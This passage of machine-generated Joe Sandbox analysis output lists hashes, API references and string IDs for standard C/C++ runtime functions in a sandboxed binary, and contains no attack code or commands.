                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: 5a14ae2b555e9ab7f728332c0d73c5948ec6e8865da7ea6a3729053d11302c93
                                              • Instruction ID: 615b89a1821be4796f66bfe8902afbc1fcd9b625e5876833a8c3fab35fb5e7c4
                                              • Opcode Fuzzy Hash: 5a14ae2b555e9ab7f728332c0d73c5948ec6e8865da7ea6a3729053d11302c93
                                              • Instruction Fuzzy Hash: 56F0583071521DFBDB01AB60C80DB9EBA7DBB01B6AF114066BC00A24A0CF388A01DBA0
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C1FAA1E
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C1FAA29
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C1FAA97
                                                • Part of subcall function 6C1FA920: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C1FA938
                                              • std::locale::_Setgloballocale.LIBCPMT ref: 6C1FAA44
                                              • _Yarn.LIBCPMT ref: 6C1FAA5A
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                              • String ID:
                                              • API String ID: 1088826258-0
                                              • Opcode ID: 0277b8f517b27604e1f62203e072f0943baff9ab34d431542be464755e014dd9
                                              • Instruction ID: c5674a53fa030c1ed96fdb5dca7e4363ca7bf337514abaf7a516075c1bb2dff9
                                              • Opcode Fuzzy Hash: 0277b8f517b27604e1f62203e072f0943baff9ab34d431542be464755e014dd9
                                              • Instruction Fuzzy Hash: BD01BC79B112189FDB06DF20C864ABC7BF1FF95658B180048DC2217B80CF38AA0BCB81
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $!$@
                                              • API String ID: 3519838083-2517134481
                                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                              • Instruction ID: e285bd7388511030c3deaa77c5cb499c8c7f58b8e819bf075bcdbeef3486c21b
                                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                              • Instruction Fuzzy Hash: 6E129A30A0624EDFCB24DFA4C4D0ADDBBB1BF08319F14946AE805ABB51DB35E955CB60
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog__aulldiv
                                              • String ID: $SJ
                                              • API String ID: 4125985754-3948962906
                                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                              • Instruction ID: 54989f2db4c0d3f8faf50de78fe7398bfbd23355c76b46376200350905aa4dd4
                                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                              • Instruction Fuzzy Hash: 69B12CB5E0020EDFCB18CF95C8809AEBBB5FF48315B60853EE956A7B50D730AA45CB50
                                              APIs
                                                • Part of subcall function 6C1FAA17: __EH_prolog3.LIBCMT ref: 6C1FAA1E
                                                • Part of subcall function 6C1FAA17: std::_Lockit::_Lockit.LIBCPMT ref: 6C1FAA29
                                                • Part of subcall function 6C1FAA17: std::locale::_Setgloballocale.LIBCPMT ref: 6C1FAA44
                                                • Part of subcall function 6C1FAA17: _Yarn.LIBCPMT ref: 6C1FAA5A
                                                • Part of subcall function 6C1FAA17: std::_Lockit::~_Lockit.LIBCPMT ref: 6C1FAA97
                                                • Part of subcall function 6C0C2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C0C2F95
                                                • Part of subcall function 6C0C2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C0C2FAF
                                                • Part of subcall function 6C0C2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C2FD0
                                                • Part of subcall function 6C0C2F60: __Getctype.LIBCPMT ref: 6C0C3084
                                                • Part of subcall function 6C0C2F60: std::_Facet_Register.LIBCPMT ref: 6C0C309C
                                                • Part of subcall function 6C0C2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C30B7
                                              • std::ios_base::_Addstd.LIBCPMT ref: 6C0C211B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                              • API String ID: 3332196525-1866435925
                                              • Opcode ID: 25274ee18c3ed251ef734868162f6457e46e3cb3c70b9baa7325e0465d5b6f85
                                              • Instruction ID: 5fcaff7139d5d85fa6fe2354665cce87eefdd471f1342065b7ecaab055dde155
                                              • Opcode Fuzzy Hash: 25274ee18c3ed251ef734868162f6457e46e3cb3c70b9baa7325e0465d5b6f85
                                              • Instruction Fuzzy Hash: A241B0B1A003099FDB00CF64C8497AEBBF0FF48714F105268E919ABB91E775A985CF91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $CK$CK
                                              • API String ID: 3519838083-2957773085
                                              • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                              • Instruction ID: 5b5d11b605ac6febd153c6870eb2e8fe414387e00c5f4108e0e097cc27c14f6e
                                              • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                              • Instruction Fuzzy Hash: FB21B871E41209CFCB08EFE8C5805EEF7BAFF95314F14862AC811A7B91C7745A15CA51
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 0$LrJ$x
                                              • API String ID: 3519838083-658305261
                                              • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                              • Instruction ID: a8103df67d60217cce74ad2afb29d400489aebe6d78533e698ea3eb16e84fa28
                                              • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                              • Instruction Fuzzy Hash: 05218E32D0121D9BDF05DBD8C990AEDB7B5EF58708F20015AE80177B80DB799E48DBA5
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C257ECC
                                                • Part of subcall function 6C24258A: __EH_prolog.LIBCMT ref: 6C24258F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: :hJ$dJ$xJ
                                              • API String ID: 3519838083-2437443688
                                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                              • Instruction ID: 21643baa6577ac4a682d30b65edba951b26849716f0a08e0a34e97f673b739fb
                                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                              • Instruction Fuzzy Hash: EA21E9B0801B44CFC760CF6AC14428ABBF4FF29708B40CA5EC4AA97B11D7B8A609CF55
                                              APIs
                                              • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C20E7C0,6C0C1DEA,00008000,6C20E7C0,?,?,?,6C20E36F,6C20E7C0,?,00000000,6C0C1DEA), ref: 6C20E4B9
                                              • GetLastError.KERNEL32(?,?,?,6C20E36F,6C20E7C0,?,00000000,6C0C1DEA,?,6C217D8E,6C20E7C0,000000FF,000000FF,00000002,00008000,6C20E7C0), ref: 6C20E4C3
                                              • __dosmaperr.LIBCMT ref: 6C20E4CA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer__dosmaperr
                                              • String ID: 8Q
                                              • API String ID: 2336955059-4022487301
                                              • Opcode ID: 6bcd63eb18071b4e36b87fff6125380a20c75ecd303eb09d6626d7ef667747dd
                                              • Instruction ID: d50fa9769e21a506555da27f196836e370db5b808581f871dfe3e8ccde9177bd
                                              • Opcode Fuzzy Hash: 6bcd63eb18071b4e36b87fff6125380a20c75ecd303eb09d6626d7ef667747dd
                                              • Instruction Fuzzy Hash: 7F01D83271451DABCB058F69CC44C9D3B7EEB86735728020AFD619B6D0EAB1D9418790
                                              APIs
                                              • AcquireSRWLockExclusive.KERNEL32(6C2F766C,?,652EF5AA,6C0C230E,6C2F730C), ref: 6C1FA1F7
                                              • ReleaseSRWLockExclusive.KERNEL32(6C2F766C), ref: 6C1FA22A
                                              • WakeAllConditionVariable.KERNEL32(6C2F7668), ref: 6C1FA235
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                              • String ID: lv/l
                                              • API String ID: 1466638765-1456510555
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: <J$DJ$HJ$TJ$]
                                              • API String ID: 0-686860805
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aulldiv
                                              • String ID:
                                              • API String ID: 3732870572-0
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,6C202654,6C229DD0,0000000C), ref: 6C2080A7
                                              • _free.LIBCMT ref: 6C208104
                                              • _free.LIBCMT ref: 6C20813A
                                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C202654,6C229DD0,0000000C), ref: 6C208145
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ErrorLast_free
                                              • String ID:
                                              • API String ID: 2283115069-0
                                              APIs
                                              • WriteConsoleW.KERNEL32(00000000,?,6C217DDC,00000000,00000000,?,6C218241,00000000,00000001,00000000,6C20E7C0,?,6C20F976,?,?,6C20E7C0), ref: 6C2195C1
                                              • GetLastError.KERNEL32(?,6C218241,00000000,00000001,00000000,6C20E7C0,?,6C20F976,?,?,6C20E7C0,?,6C20E7C0,?,6C20F40C,6C2191A6), ref: 6C2195CD
                                                • Part of subcall function 6C21961E: CloseHandle.KERNEL32(FFFFFFFE,6C2195DD,?,6C218241,00000000,00000001,00000000,6C20E7C0,?,6C20F976,?,?,6C20E7C0,?,6C20E7C0), ref: 6C21962E
                                              • ___initconout.LIBCMT ref: 6C2195DD
                                                • Part of subcall function 6C2195FF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C21959B,6C21822E,6C20E7C0,?,6C20F976,?,?,6C20E7C0,?), ref: 6C219612
                                              • WriteConsoleW.KERNEL32(00000000,?,6C217DDC,00000000,?,6C218241,00000000,00000001,00000000,6C20E7C0,?,6C20F976,?,?,6C20E7C0,?), ref: 6C2195F2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                              • String ID:
                                              • API String ID: 2744216297-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C231077
                                                • Part of subcall function 6C230FF5: __EH_prolog.LIBCMT ref: 6C230FFA
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: :$\
                                              • API String ID: 3519838083-1166558509
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog__aullrem
                                              • String ID: d%K
                                              • API String ID: 3415659256-3110269457
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog3_
                                              • String ID: 8Q
                                              • API String ID: 2427045233-4022487301
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: @$hfJ
                                              • API String ID: 3519838083-1391159562
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C24BC5D
                                                • Part of subcall function 6C24A61A: __EH_prolog.LIBCMT ref: 6C24A61F
                                                • Part of subcall function 6C24AA2E: __EH_prolog.LIBCMT ref: 6C24AA33
                                                • Part of subcall function 6C24BEA5: __EH_prolog.LIBCMT ref: 6C24BEAA
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: WZJ
                                              • API String ID: 3519838083-1089469559
                                              APIs
                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 6C0C2A76
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ___std_exception_destroy
                                              • String ID: Jbx$Jbx
                                              • API String ID: 4194217158-1161259238
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: <dJ$Q
                                              • API String ID: 3519838083-2252229148
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $D^J
                                              • API String ID: 3519838083-3977321784
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C217DC6), ref: 6C21070B
                                              • __dosmaperr.LIBCMT ref: 6C210712
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr
                                              • String ID: 8Q
                                              • API String ID: 1659562826-4022487301
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: X&L$p|J
                                              • API String ID: 3519838083-2944591232
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 0|J$`)L
                                              • API String ID: 3519838083-117937767
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aulldiv
                                              • String ID: 3333
                                              • API String ID: 3732870572-2924271548
                                              • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                              • Instruction ID: 265a9cb7dfa89611be864596d014f9692dc29791475d950551710ef62b7d7c6e
                                              • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                              • Instruction Fuzzy Hash: 7921BAB4A00718AFD724CFAA8880B5BFAFCEB44755F108A1EA586D3B40D77099448765
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: @$LuJ
                                              • API String ID: 3519838083-205571748
                                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                              • Instruction ID: 7f16ea1f92247adeaa10d335a02b6ed38fe58b18b7b7ee9722caaa075ecd56bb
                                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                              • Instruction Fuzzy Hash: 56016172E0224ADBDB10DF9A84809AEF7B4FF56704F50842EE96AE3A41C3349944CF65
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: @$xMJ
                                              • API String ID: 3519838083-951924499
                                              • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                              • Instruction ID: d092169f99b5e022189a1670d658ddb6c8c4ab531e28ae0b2d9f88d22aa76ee8
                                              • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                              • Instruction Fuzzy Hash: 991130B1A0131ADBCB00DFA9E49059EB7B4FF58308B50D46EE869E7640D3349A05CB55
                                              APIs
                                              • _free.LIBCMT ref: 6C211439
                                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C20DD2A,?,00000004,?,4B42FCB6,?,?,6C202E7C,4B42FCB6,?), ref: 6C211475
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: AllocHeap_free
                                              • String ID: 8Q
                                              • API String ID: 1080816511-4022487301
                                              • Opcode ID: ea3d6075cece48542f8999695606b634c29cdbec26ec60f880b8b070b50230b4
                                              • Instruction ID: 2eb8de324644824d7cc1d627648556a7149b84b35558f60ab683766a53c61121
                                              • Opcode Fuzzy Hash: ea3d6075cece48542f8999695606b634c29cdbec26ec60f880b8b070b50230b4
                                              • Instruction Fuzzy Hash: 94F0283170D11EA6DB101A279C04E8B27E89FE2FBAB108116FE1156E80DBB0D4858191
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C262746
                                                • Part of subcall function 6C2627BF: __EH_prolog.LIBCMT ref: 6C2627C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: ur&l$sJ
                                              • API String ID: 3519838083-1921328803
                                              • Opcode ID: 479f86800d12ad63e1b8ae242903cd26d6f9166e8cc8054c33d6365a60c3e9bf
                                              • Instruction ID: 2f1dddf62f140c72b8194892c727cf6cc389e16d13ada94bcdb4dddf9689b306
                                              • Opcode Fuzzy Hash: 479f86800d12ad63e1b8ae242903cd26d6f9166e8cc8054c33d6365a60c3e9bf
                                              • Instruction Fuzzy Hash: 7701A231A0001CABCB16BBA5C840EEDBB75AF84718F00401AEC0152A90CF789999DFD1
                                              APIs
                                              Strings
                                              Memory Dump Source
